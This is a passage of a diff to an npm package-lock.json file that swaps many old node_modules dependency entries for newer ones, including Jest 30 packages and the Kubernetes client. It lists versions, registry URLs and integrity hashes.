"https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.2.tgz", - "integrity": "sha512-cOU9usZw8/dXIXKtwa8pM0OTJQuJkxMN6w30csNRUerHfeQ5R6U3kkU/FtJeIf3M202OHfY2U8ccInBG7/xogA==", + "@jest/get-type": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/get-type/-/get-type-30.0.1.tgz", + "integrity": "sha512-AyYdemXCptSRFirI5EPazNxyPwAL0jXt3zceFjaj8NFiKP9pOi0bfXonf6qkf82z2t3QWPeLCWWw4stPBzctLw==", "dev": true }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", + "@jest/pattern": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/pattern/-/pattern-30.0.1.tgz", + "integrity": "sha512-gWp7NfQW27LaBQz3TITS8L7ZCQ0TLvtmI//4OwlQRx4rnWxcPNIYjxZpDcN4+UlGxgm3jS5QPz8IPTCkb59wZA==", "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" + "requires": { + "@types/node": "*", + "jest-regex-util": "30.0.1" } }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", + "@jsep-plugin/assignment": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", + "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.1.tgz", - "integrity": "sha512-iBPtljfCNcTKNAto0KEtDfZ3qzjJvqE3aTGZsbhjSBlorqpXJlaWWtPO35D+ZImoC3KWejX64o+yPGxhWSTzfg==", - "dev": true + "requires": {} }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "@jsep-plugin/regex": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", + "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", "dev": true, - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true + "requires": {} }, - "node_modules/colorette": { + "@kubernetes/client-node": { "version": "1.3.0", - "resolved": "https://registry.npmjs.org/colorette/-/colorette-1.3.0.tgz", - "integrity": "sha512-ecORCqbSFP7Wm8Y6lyqMJjexBQqXSF7SSeaTyGGphogUjBlFP9m9o08wy86HL2uB7fMTxtOUzLMk7ogKcxMg1w==", - "dev": true - }, - "node_modules/combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "dependencies": { - "delayed-stream": "~1.0.0" - }, - "engines": { - "node": ">= 0.8" - } - }, - "node_modules/commander": { - "version": "5.1.0", - "resolved": "https://registry.npmjs.org/commander/-/commander-5.1.0.tgz", - "integrity": "sha512-P0CysNDQ7rtVw4QIQtm+MRxV66vKFSvlsQvGYXZWR3qFU0jlMKHZZZgw8e+8DSah4UDKMqnknRDQz+xuQXQ/Zg==", - "engines": { - "node": ">= 6" - } - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=" - }, - "node_modules/convert-source-map": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.8.0.tgz", - "integrity": "sha512-+OQdjP49zViI/6i7nIJpA8rAl4sV/JdPfU9nZs3VqOwGIgizICvuN2ru6fMd+4llL0tar18UYJXfZ/TWtmhUjA==", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", "dev": true, - "dependencies": { - "safe-buffer": "~5.1.1" + "requires": { + "@types/js-yaml": "^4.0.1", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", + "isomorphic-ws": "^5.0.0", + "js-yaml": "^4.1.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", + "openid-client": "^6.1.3", + "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", + "stream-buffers": "^3.0.2", + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" + "@types/istanbul-lib-coverage": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", + "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", + "dev": true }, - "node_modules/cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", + "@types/istanbul-lib-report": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", "dev": true, - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" + "requires": { + "@types/istanbul-lib-coverage": "*" } }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "dependencies": { - "assert-plus": "^1.0.0" - }, - "engines": { - "node": ">=0.10" + "@types/istanbul-reports": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", + "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", + "dev": true, + "requires": { + "@types/istanbul-lib-report": "*" } }, - "node_modules/debug": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.2.tgz", - "integrity": "sha512-mOp8wKcvj7XxC78zLgw/ZA+6TSgkoE2C/ienthhRD298T7UNwAg9diBpLRxC0mOezLl4B0xV7M0cCO6P/O0Xhw==", + "@types/jest": { + "version": "30.0.0", + "resolved": "https://registry.npmjs.org/@types/jest/-/jest-30.0.0.tgz", + "integrity": "sha512-XTYugzhuwqWjws0CVz8QpM36+T+Dz5mTEBKhNs/esGLnCIlGdRy+Dq78NRjd7ls7r8BC8ZRMOrKlkO1hU0JOwA==", "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" + "requires": { + "expect": "^30.0.0", + "pretty-format": "^30.0.0" }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "node_modules/deepmerge": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.0.tgz", - "integrity": "sha512-z2wJZXrmeHdvYJp/Ux55wIjqo81G5Bp4c+oELTW+7ar6SogWHajt5a9gO3s3IDaGSAXjDk0vlQKN3rms8ab3og==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=", - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", - "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.3.803", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.3.803.tgz", - "integrity": "sha512-tmRK9qB8Zs8eLMtTBp+w2zVS9MUe62gQQQHjYdAc5Zljam3ZIokNb+vZLPRz9RCREp6EFRwyhOFwbt1fEriQ2Q==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.0.0.tgz", - "integrity": "sha512-ov6w/2LCiuyO4RLYGdpFGjkcs0wMTgGE8PrkTHikeUy5iJekXyPIKUjifk5CsE0pt7sMCrMZ3YNqoCj6idQOnQ==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-OKrGESHOaMxK3b6zxIq9SOW8kEXztKff/Dvg88j4xIJxur1hspEbedVkR3GpHe5LO+WB2Qw7OWN0RMTdp6as5A==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/expect/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=", - "engines": [ - "node >=0.6.0" - ] - }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "node_modules/fb-watchman": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.1.tgz", - "integrity": "sha512-DkPJKQeY6kKwmuMretBhr7G6Vodr7bFwDYTXIkfG1gjvNpaxBTQV3PbXg6bR1c1UP4jPOX0jHUbbHANL9vRjVg==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==", - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/RubenVerborgh" - } - ], - "engines": { - "node": ">=4.0" - }, - "peerDependenciesMeta": { - "debug": { - "optional": true - } - } - }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=", - "engines": { - "node": "*" - } - }, - "node_modules/form-data": { - "version": "2.5.1", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "dependencies": { - "minipass": "^3.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=" - }, - "node_modules/fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "dependencies": { - "assert-plus": "^1.0.0" - } - }, - "node_modules/glob": { - "version": "7.1.7", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.1.7.tgz", - "integrity": "sha512-OvD9ENzPLbegENnYP5UUfJIirTg4+XwMWGaQfQTY0JenxNvvIKP3U3/tAQSPIu/lHxXYSZmpXlUHeqAIdKzBLQ==", - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.0.4", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=", - "engines": { - "node": ">=4" - } - }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.1" - }, - "engines": { - "node": ">= 0.4.0" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", - "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - }, - "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" - } - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha1-khi5srkoojixPcT7a21XbyMUU+o=", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.5.0.tgz", - "integrity": "sha512-TXCMSDsEHMEEZ6eCA8rwRDbLu55MRGmrctljsBX/2v1d9/GzqHOxW5c5oPSgrUt2vBFXebu9rGqckXGPWOlYpg==", - "dev": true, - "dependencies": { - "has": "^1.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": 